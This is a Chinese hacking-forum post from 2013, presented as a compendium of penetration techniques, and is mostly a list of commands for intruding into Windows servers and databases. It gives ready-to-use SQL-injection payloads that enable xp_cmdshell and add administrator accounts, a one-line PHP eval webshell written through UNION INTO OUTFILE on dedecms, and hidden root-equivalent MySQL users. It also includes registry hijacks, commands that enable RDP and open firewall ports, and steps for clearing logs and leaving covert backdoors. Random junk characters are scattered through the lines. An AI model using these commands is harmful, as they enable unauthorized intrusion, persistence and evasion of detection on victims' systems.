中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全
7 K0 @# N: e$ \5 ]$ Y
1.net user administrator /passwordreq:no
( L, D" ?. S2 t- ?+ z9 D% q$ |这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
  r- M$ R8 g2 B1 b( f+ Q9 [5 S& p2.比较巧妙的建克隆号的步骤
( `! L* I2 X+ E" H先建一个user的用户) @& s/ ]7 N; t1 h
然后导出注册表。然后在计算机管理里删掉9 s0 g5 t2 \4 S+ w
在导入,在添加为管理员组
! Y% y$ ~$ L7 X! {% U3.查radmin密码) T- x' L" Y; B  N+ j
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
2 x# K  _' R5 Y; I) i9 J, L4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]$ f; M1 y) k' Z" A5 s' @
建立一个"services.exe"的项' q# C  Q  W1 J0 v. l; L; ^
再在其下面建立(字符串值)
+ E; o3 G& n/ _( M( L键值为mu ma的全路径
& d; Y9 z4 y' Z( R1 a- V5.runas /user:guest cmd; b5 c+ z3 o. U4 d
测试用户权限!* w  P# Z1 s  G
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
* t2 u- V  S% J& e3 p, {7.入侵后漏洞修补、痕迹清理,后门置放:9 [; l$ P3 }; }; v7 L8 H
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
  n+ U( R$ `! K8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c* l* y0 K% B( y  K

8 g4 D* l( Z" U% \for example
! W' A0 j; `; O& J7 |  ^! \6 J- o) u, G+ {4 l9 B  y- i9 V/ T  A% N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
; q% T( e- Z$ O# R
3 O" @2 E$ j0 I% t  o1 `7 ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'4 L( N0 e( I3 `) Z3 ~6 ^, {4 Z: ~
+ n# e' o" K' P" z
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了+ B6 P) \$ R; w# G
如果要启用的话就必须把他加到高级用户模式! @# q- o" q% t/ X. J  [
可以直接在注入点那里直接注入
7 h) i6 n- \) h& G* l+ d. H0 e% q! qid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--- T: N# D5 I; m" |/ x' A
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
# r7 G, T* t) l, Z2 [8 Q- e或者' y; T7 ~2 D6 @( n
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'* w5 }+ \0 t3 C0 l1 @" o
来恢复cmdshell。
$ a3 }7 S0 m5 f3 p( R9 ~9 \7 }
/ O% R1 n! l1 n4 R9 }6 d: c分析器7 {8 m5 {! J% e/ d' C, E
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
* S4 W( ]7 e9 ^+ i/ _1 y$ J0 T! e然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")0 W! k: n0 [/ b
10.xp_cmdshell新的恢复办法
6 n, U: g2 d3 v% c( l4 n/ jxp_cmdshell新的恢复办法
$ p# n/ Y/ s4 M9 E) u4 i; N* w扩展储存过程被删除以后可以有很简单的办法恢复:
' @8 G2 w! _3 M: o/ G删除3 {$ g+ O# B) R) u7 l, S3 \& W: v9 [+ W
drop procedure sp_addextendedproc
- e+ {- k/ \! adrop procedure sp_oacreate) _( W& R& h+ e, R& U
exec sp_dropextendedproc 'xp_cmdshell'
9 U  s) W; }) A/ d, V1 n/ u3 ?
+ ^6 c" C/ I/ N0 v) w0 i  Z3 e恢复
4 }; j1 M7 L4 H. m  Ndbcc addextendedproc ("sp_oacreate","odsole70.dll")( O3 p5 ]; F# u; S
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
2 B8 L% y/ k0 V/ R# ~( L4 S7 n/ Y! J8 c/ J' `8 d( S/ a9 c0 Q& M! J2 r
这样可以直接恢复,不用去管sp_addextendedproc是不是存在5 c  f8 i* k" }; }  U. w
: @$ b% F0 e/ q- k
-----------------------------
* f* F  b$ t( |8 G9 C. }3 ]# D6 K) ~) ~- }5 z( |
删除扩展存储过过程xp_cmdshell的语句:& N( K8 n  I8 E. w) P* N
exec sp_dropextendedproc 'xp_cmdshell'
6 S5 c+ S! R$ T: `$ r/ d
# i  K/ G% n9 T恢复cmdshell的sql语句
+ M0 n8 T5 u* E. s/ w& uexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
, E$ e' ^& b  I0 n6 p5 {- L* B( ?1 @6 \. j) ~3 f9 t
& \/ q/ H* t2 ~5 E5 ]. h- }
开启cmdshell的sql语句
% ?6 c2 {" a- t! U
5 u8 C$ m# k9 v7 lexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" x. v0 j' }0 I  _, l: g
& Q* U: Q, \0 |9 a* c
判断存储扩展是否存在
5 V- \. h3 }0 y1 H9 H+ v5 ?* eselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
2 u/ ^' u- Y2 g7 f, f, B% i返回结果为1就ok% u5 {/ w7 w2 Q" f4 Y% b% `/ `/ b

4 J: ?- F" ]0 Y, [3 f4 L/ ?恢复xp_cmdshell
" F7 M+ u! G. m/ `" mexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
  b3 S* y; D1 c9 b- x返回结果为1就ok8 o% |: Z" h% }- q
4 ^- g7 h+ G: V% j4 S
否则上传xplog7.0.dll
% P& i4 I9 ~% w, f1 J& Texec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
# V8 x/ q/ m5 T# u$ W; u1 }) \) u' N, b6 `
堵上cmdshell的sql语句+ x, ^# }6 F5 [$ G2 f
sp_dropextendedproc "xp_cmdshel4 K: g! K" o6 S% @
-------------------------" Q2 Y; l! E* y, C1 D4 U
清除3389的登录记录用一条系统自带的命令:8 L3 i) J* c' e4 y, k
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f" ]; b- z. I' S7 q
5 M/ J# i2 T+ D4 g( J- _7 G. l* {
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件# m: X! p3 p5 T  O0 ^
在 mysql里查看当前用户的权限
7 L+ Y. t, z- E8 N0 Q+ ~6 jshow grants for  
( [8 ]' R9 |/ L  H( ^6 ^+ P- g0 o+ u% F
( x* n# q7 E: M6 v以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
) s! `8 V2 @! S, L
: P* F( c+ v% D  k2 S8 `$ N
4 f/ @1 O2 g& y. XCreate USER 'itpro'@'%' IDENTIFIED BY '123';& t0 `% R+ \  j

4 I$ A  ~0 l, p5 Y1 A; N! SGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION$ s+ w  f; L4 `. @
% y2 @4 n% g. f  S. j( }1 N
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
! l- M- d  S4 G) z. Z. O" }
; A$ F- A. P* P) h. y7 y( R" EMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 U0 Y( |+ R0 m: [; K+ u5 A- R' P/ y
搞完事记得删除脚印哟。0 n9 H/ @7 J* u, j: V
- a3 I8 g3 z0 g/ h2 k  z+ q" U% z! A
Drop USER 'itpro'@'%';
/ U$ Z5 B4 P3 A' U
$ m; m- _6 K! \: z. gDrop DATABASE IF EXISTS `itpro` ;
' {& I" V0 q/ t' v5 y2 o! T9 U) G0 }# x9 f& E" T5 Z+ [4 P. r) `
当前用户获取system权限. X5 o9 S% U4 A! ^: A0 j% W
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
. z- A3 B1 m, Q( B* c4 \sc start SuperCMD
4 O# S: q# V( y: W- g程序代码
# ^8 E) J2 [9 K' H( X2 t<SCRIPT LANGUAGE="VBScript">' e- b  o# q( R* y2 b
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
- Z0 t0 Q% C# Z: e/ Gos="WinNT://"&wsnetwork.ComputerName
) j; i* P: O2 ]; \Set ob=GetObject(os)
$ ^' e: e$ o7 P- k6 s9 mSet oe=GetObject(os&"/Administrators,group")
# w3 T, [. b) @. L  xSet od=ob.Create("user","nosec")! e0 C7 \: m  Z0 O+ M4 o1 r
od.SetPassword "123456abc!@#"
7 U$ x, b1 b5 A  w9 k- ~: M+ k" Iod.SetInfo( Y) j4 {/ \: p+ i4 c" f: G. A
Set of=GetObject(os&"/nosec",user)
: U- L* h7 i% m' e6 {oe.add os&"/nosec"* d  `! r- z. p: L8 v/ K
</Script>
5 k2 ~0 J, s4 {8 D( P0 \# I& e<script language=javascript>window.close();</script>
5 D" @# x; @$ B$ k, S, s
% e  y2 b/ [6 Z2 m" T2 F8 O& T3 _. l7 f
5 ?3 d( M1 r  @0 _6 K5 E" H

5 F$ I. O% z2 ^& J: p( u4 n, |突破验证码限制入后台拿shell
7 u+ T1 x( D: T程序代码
& d0 }( ~/ w) @$ A6 D: O6 X$ {6 pREGEDIT4 ; I) m" x6 p6 Q5 p( h/ H7 e
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 0 [( ^% _" M# w3 y* ^) {
"BlockXBM"=dword:00000000
4 d3 i; v0 F3 J# g0 ?. z
( c3 t7 |% [: d4 ]保存为code.reg,导入注册表,重器IE
0 w9 o; p% u; K. C0 Q就可以了
: X0 }& m1 ^# z/ I& s, ~union写马& N/ _/ a/ [* X1 C& k8 Z
程序代码
+ E: x  {" N$ A) K* L4 mwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
. m4 {- D' V0 D* r, z8 Z! ^
* e! D6 V9 a5 m( Y( g4 i) X* L应用在dedecms注射漏洞上,无后台写马
8 t2 K# {8 H$ ?- I2 B% }dedecms后台,无文件管理器,没有outfile权限的时候
. T2 P3 O& U" P8 S9 d: `1 {在插件管理-病毒扫描里
2 [# l  r: C, t4 G6 k0 O& p- s) W  D写一句话进include/config_hand.php里
2 D+ G0 j! N( L程序代码
, j' {8 f, n2 ~* T, `* K3 e+ `" z>';?><?php @eval($_POST[cmd]);?>( W8 X, P2 h6 {1 q$ q
; C& {- b; |$ V5 r- D  B
' Y2 S; c6 e4 `0 G
如上格式) p5 O7 I7 A  B" h% h% W% T! p
7 G+ y6 |  e: c& G6 X
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解6 _& u# [% `- b. _2 ^. }1 T
程序代码
) A* i$ [1 z! X, b) r+ Iselect username,password from dba_users;
0 K' A# W$ x6 P, P. s4 t2 ~9 K0 ?- X& M; C$ q4 z$ e
0 |$ g; N: S3 z, B0 {
mysql远程连接用户
1 s5 u/ {! }+ g+ |7 |0 G7 |程序代码2 X$ E: O! i3 v3 e3 y
; o) }7 g" |5 a1 g$ C# }
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';5 l" X) i+ ?/ n7 N3 y
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION3 Y7 @6 \" _7 ~" `. k$ V2 |' Z& r/ Z
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# `. O& D; Z- N# P* q/ G
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
- O5 V( U! v9 R% d2 x2 }! X- W- k

7 {& N9 K/ i, j7 ]1 U$ {- A3 I$ S" V2 R; r

& X, P" h( j0 V9 ~echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
; E& ?4 z$ \- O" D0 [# |; |  G/ U6 t# R3 N$ v! X
1.查询终端端口
5 a& q9 k; g! i5 O) l" s# n# D, @/ c) _! v$ Q) V1 s
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber3 P) O8 `& H$ J$ J- z, c
# F6 x, v* p" A' f" v  V6 K7 W
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"7 p7 r8 ]# c" b, x9 l( `1 N1 V
type tsp.reg
% m. S& i& V/ _- t% c
  O+ D9 n+ h5 h: {$ u! y8 y2.开启XP&2003终端服务6 T/ M# Z5 z, b7 j' F/ ?  |2 h+ h

% q) Y& H& m$ [# M4 w; B  W) m7 Y  X$ |
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f- k. e, C% \' G7 T0 ~# q
+ ~# G, B( i" B- {

4 e+ S! M+ e* a& w' e, C7 {REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f0 i$ j4 c& {& D* i) j+ ^
' k$ P# O+ X' [5 L  P0 j0 R+ H
3.更改终端端口为20008(0x4E28)
0 k/ x0 E5 X* d) _8 O4 x9 [0 H) ?
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
1 {, ?" }5 k/ m7 s5 d* A9 G  B
5 V( X% g2 r  C% T2 T6 x. @/ fREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f7 b. Z4 F9 v6 C/ h& M$ L& ~7 E8 g

% ~" u- [7 s+ n4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
5 u% ^- `# a; i6 [% ~$ d" K" _$ E  n( U
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
2 n0 E* X; e1 L# X, \, k1 k) C3 _/ h. Y% ]1 @% E7 I
! h* `$ m- _$ A; u% p2 T" T
5.开启Win2000的终端,端口为3389(需重启)
) o: g( J; H* O1 B. E
( l- U9 [8 E7 E: S' Y) s$ vecho Windows Registry Editor Version 5.00 >2000.reg
6 t4 ^3 j8 ]1 F  Mecho. >>2000.reg
) o4 g& w7 |8 r* k% [echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ; K1 x7 q3 V' _$ M" M: Y4 T
echo "Enabled"="0" >>2000.reg
7 M/ [7 X1 N* Z0 \9 ]$ _echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg * L& H5 T3 C* x: x) t
echo "ShutdownWithoutLogon"="0" >>2000.reg
. t' m4 X0 d  Wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg $ f1 U5 Z0 @$ e9 R1 _; D( ?
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
; y, k8 J$ a# w, A' P* Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 0 F/ e3 J0 B7 Z( F9 B/ U
echo "TSEnabled"=dword:00000001 >>2000.reg 0 m! `0 V- L; I' k) s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg , U$ h: p9 E+ p* R. J$ I
echo "Start"=dword:00000002 >>2000.reg ! C. o' s' ]/ {% i& s; ?/ L; T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
1 w- H7 }, K6 P% techo "Start"=dword:00000002 >>2000.reg * S& o0 V: B+ m9 |, b; t7 k  {& i
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
1 @; W7 ^  T5 c  n  `! vecho "Hotkey"="1" >>2000.reg
0 ?% Q  \; C% k& `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
( i* p- ?. L* @/ v4 g0 z3 recho "ortNumber"=dword:00000D3D >>2000.reg % D  w% h# g4 g8 n: X* d3 j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
: v9 E7 j& `0 B% E3 W% E2 A6 Iecho "ortNumber"=dword:00000D3D >>2000.reg
, P6 ]9 l/ }1 x9 u) A) L
0 i  r+ u7 S$ L' B8 o* `6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)3 M# J$ V$ v3 c8 b  z" l

  |* z* ~% [8 F5 Q( J9 M' L@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
0 T) l) A' S0 y/ B- m0 d/ ^* P$ }  R(set inf=InstallHinfSection DefaultInstall)
- `5 F1 }" o5 R1 `# h! recho signature=$chicago$ >> restart.inf4 Y. x8 O! L0 e9 A3 A7 Z( i4 Q
echo [defaultinstall] >> restart.inf6 B, o; [8 ^& @9 L. H5 \
rundll32 setupapi,%inf% 1 %temp%\restart.inf
5 ?- O& a; S" k* r% u. C
: C5 }% a; f/ |1 b
) w% ]) J" ]) n  u# H7.禁用TCP/IP端口筛选 (需重启)1 u+ d5 }9 [+ |; \, a' X* y
- B+ U% o3 A; ^* n
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
7 O2 h6 S* I7 E4 N) l: U6 y! ]
/ |/ Q! @1 h5 F; Z; P) m5 G4 {8.终端超出最大连接数时可用下面的命令来连接/ I* x% C" W7 ]. ]  ]9 R" [

0 m  n& [4 O! R0 T( b( ~mstsc /v:ip:3389 /console' W0 ?0 u( W$ p+ S

9 k) g/ w+ P! ?5 b9.调整NTFS分区权限
- ^, {* |* J/ `: z6 l2 [) N, ]1 H: I" X: d% Z
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
4 e6 a* k( \0 f' c! @( b. y
0 G! `9 p4 R& x1 `' a! j3 q' k9 Kcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)( E$ E! Y5 J9 U( N" J; B8 Q, b
, H- t/ {' g7 A* g/ ~/ s
------------------------------------------------------
! V  `" ~- l9 D% R( _+ V3389.vbs
# W' s/ V6 J* XOn Error Resume Next$ D' E6 j, C; _" B
const HKEY_LOCAL_MACHINE = &H80000002
" }9 P" B; N) z3 G  L! \: |. PstrComputer = "."
3 m% x" F) t* ]' s8 eSet StdOut = WScript.StdOut8 D$ `1 h% P% N+ o
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_: U3 r; Q+ r% N
strComputer & "\root\default:StdRegProv")
/ j, [& t) z/ Q: I. istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 y8 T# D" r& x3 c3 f# ~7 K+ xoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
/ ?' R, g- f) Z4 ~strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 L- h" Q9 E/ E# N0 w* g. ?oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath1 G, A& P8 o) N/ j3 _
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
  W9 u" Y) F5 v4 d% X1 NstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"- s8 Q) D+ H% G* \
strValueName = "fDenyTSConnections"4 E3 U* u0 c7 w
dwValue = 0& `$ h0 [' m2 u, ^
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue$ |: X2 k) N2 D( y7 @# W
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
4 W- R2 Y. |* p4 e: H( EstrValueName = "ortNumber"
3 S4 c; r! h- j; s; o1 |dwValue = 33893 R8 i# m2 _/ t) P( ~
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
5 Q' z! D4 v" ~% l- u& ystrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! N% g0 X! t8 c; a* r/ B
strValueName = "ortNumber"1 R7 Y0 K) w( ?- R' E
dwValue = 3389* D3 h/ l& {  h
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, \4 n& j% j& O% ]Set R = CreateObject("WScript.Shell")
+ o; O5 [% Q6 q  WR.run("Shutdown.exe -f -r -t 0")   l4 Z. z9 k# i# ]( ^1 ^, C- Q: v

) W. B- e& ^# I9 i; M删除awgina.dll的注册表键值* c, b0 e% f, H; [; r) `
程序代码
. m% }. C3 {) Y, y
1 g% v" Z( x% ?reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
4 c2 q" |$ ?' A
: D6 W3 L$ \% r7 I- m5 s4 X) N- ]* T
, G6 q8 ?1 X* l8 r. C; H7 `5 w1 Q

1 }$ }; D9 U" G# G2 k  e& ]程序代码
" s: ]% Y5 N4 x; H3 ~1 \: gHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash3 J* |7 _9 N2 I  V
* g0 r4 W, w* U: h! N" W7 i
设置为1,关闭LM Hash
. c8 Y9 z* G6 J) e
0 O1 D& E$ N0 J6 j! N数据库安全:入侵Oracle数据库常用操作命令
* G- r7 L  N. h7 m最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。' |: Z2 m+ o& w' q* e0 q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
: k/ ?% C% v; b0 R2 p. X2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
3 N% E( i! j( o3 E, M; O% b3、SQL>connect / as sysdba ;(as sysoper)或
" w% M' T' z& |+ W8 u+ Xconnect internal/oracle AS SYSDBA ;(scott/tiger), X) v1 w0 B) {- n
conn sys/change_on_install as sysdba;
8 Y6 i* i; r- \$ f, o& k4、SQL>startup; 启动数据库实例. o. m, ]: o) _/ k3 O
5、查看当前的所有数据库: select * from v$database;. C( Q9 C2 `. s) s7 y9 j5 t$ z8 k+ I
select name from v$database;2 w. F- _) u& e( G) n+ h
6、desc v$databases; 查看数据库结构字段
( @; S- i. [6 A: j9 H/ A: ]2 E7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
6 C+ n$ U3 Y$ e/ Z/ W$ ^SQL>select * from V_$PWFILE_USERS;7 B; a% V7 W0 v/ C% p
Show user;查看当前数据库连接用户
4 L4 Q5 H" z. v0 ^2 V" L. m! @8、进入test数据库:database test;" e$ p$ @0 E# w
9、查看所有的数据库实例:select * from v$instance;
' ?4 l: V  @" T2 m如:ora9i" C' f$ T  U. W- W/ [1 c$ d
10、查看当前库的所有数据表:6 S& g& p. h3 T6 U
SQL> select TABLE_NAME from all_tables;
  B3 S2 E; L0 I  q% ]3 d, p4 lselect * from all_tables;
8 f5 O, i/ @/ e) TSQL> select table_name from all_tables where table_name like '%u%';
9 J1 F4 A4 f# J& s( hTABLE_NAME: P3 u9 D" N$ |( ?' {* j
------------------------------: P- t$ h; Y) X+ Z5 w
_default_auditing_options_
  B" q. `& @, D* ^2 R' t9 R$ P2 q11、查看表结构:desc all_tables;
3 h# F& }1 y% E& l& B- r2 O12、显示CQI.T_BBS_XUSER的所有字段结构:1 T$ y) b) B  Y. d) N1 f$ `
desc CQI.T_BBS_XUSER;' R7 L+ }; J6 }- _
13、获得CQI.T_BBS_XUSER表中的记录:
$ T& N7 O- D3 u6 j2 i5 @5 |0 @select * from CQI.T_BBS_XUSER;8 [' d' C, C. }7 g
14、增加数据库用户:(test11/test)2 P- Y! h, M" b3 E3 K( I* b0 N
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
2 I# x, i$ t, ?15、用户授权:
# k) K  I6 j7 @, P9 M& egrant connect,resource,dba to test11;6 p4 X3 E- k0 e1 z- T3 A
grant sysdba to test11;
2 c* w) S$ G' P/ Fcommit;/ Q) G% s$ }! ]7 F3 }: ]
16、更改数据库用户的密码:(将sys与system的密码改为test.)
! v7 o5 a, Z4 ^5 X( Valter user sys indentified by test;
( v5 f# z1 f8 K1 _alter user system indentified by test;3 n; L% [1 T1 C0 I+ {+ j

1 Z$ ]5 Q, a4 t( i: Y9 e: ^- {applicationContext-util.xml
8 U$ l5 X' r; W% ?. qapplicationContext.xml- H5 N9 s4 X1 C! W6 k8 D; |
struts-config.xml+ _3 n0 B. K9 l& W0 `1 ]% M
web.xml) u8 O. r0 p; f0 n$ A
server.xml; ^$ x7 p. o8 T
tomcat-users.xml
* w+ a- Z6 ^. |5 [hibernate.cfg.xml
% n/ u! A. d- f4 y# m1 C  Tdatabase_pool_config.xml" R+ ~. J0 {# K
& [$ s1 k: H; Q% e

2 S2 R3 R% W9 u$ C) {( y\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置9 A0 Q. P+ u! I% L% _
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini! f: t; f* F- [" T1 r
\WEB-INF\struts-config.xml  文件目录结构
. Z! ]/ G+ ^) ~$ w9 b/ Z& `# C( H( F) G
spring.properties 里边包含hibernate.cfg.xml的名称
& h# l& o7 X6 A5 m5 [* ^' c. n3 |9 G7 G- N4 F; H

5 g  x& L! G6 \1 n6 L5 e6 o' f9 kC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml6 J! I' q; y; {' S8 P3 K

+ d- o5 K1 z% O) K  e+ O如果都找不到  那就看看class文件吧。。
( w5 Y) O* d; q; ~% W- B3 |5 {" c! \6 P3 i3 J/ S  {2 K
测试1:
2 s, C, v# {3 MSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
0 G- d  ~. t2 [" o: _( }/ t* C1 `3 m( \
测试2:
1 v. `. \5 W. n% w0 K+ r8 Y# M) L  R5 |* V; U# m' o5 r3 u1 \! Z
create table dirs(paths varchar(100),paths1 varchar(100), id int)
( x- M) m8 j- S3 y6 |( Q/ _
' z$ j* D6 y6 V1 j; ]delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--( f9 h9 s  h& r8 B2 l

$ [- K) r" O0 r, u8 x1 g4 xSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; z. {0 @! ~( A1 ^
( S) g* b+ m. p5 \查看虚拟机中的共享文件:% S" n2 r' t/ D! F
在虚拟机中的cmd中执行! a" z' P' D2 v( _1 y
\\.host\Shared Folders
- `: M9 v3 B3 G2 ?, h5 ~6 L# [
$ W" ^9 _6 m0 Q8 \# k" n+ C( M4 u4 {: pcmdshell下找终端的技巧
# [; R9 I: b8 @! L7 ]找终端:
7 x6 B0 \6 R, u% Z第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! , {! s' }9 N7 C" X, r( Y- N/ ~8 L
   而终端所对应的服务名为:TermService 2 e8 W( B- }/ W/ F4 U' F; Z
第二步:用netstat -ano命令,列出所有端口对应的PID值! ! s  @: a/ g9 ^6 ]
   找到PID值所对应的端口, X9 @  H! B8 P  @; t- H7 `9 w5 j1 `3 T
: t5 F' S' i7 R' k0 G+ U( m
查询sql server 2005中的密码hash8 I: ~/ _! P# \/ d. I  A# r( U
